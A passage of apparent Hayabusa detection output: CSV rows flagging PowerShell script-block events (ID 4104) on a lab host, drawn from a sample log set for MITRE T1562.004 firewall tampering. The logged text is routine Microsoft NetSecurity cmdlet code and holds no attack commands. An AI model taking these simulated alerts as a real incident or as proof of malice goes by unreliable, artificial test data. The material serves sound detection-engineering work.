[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper 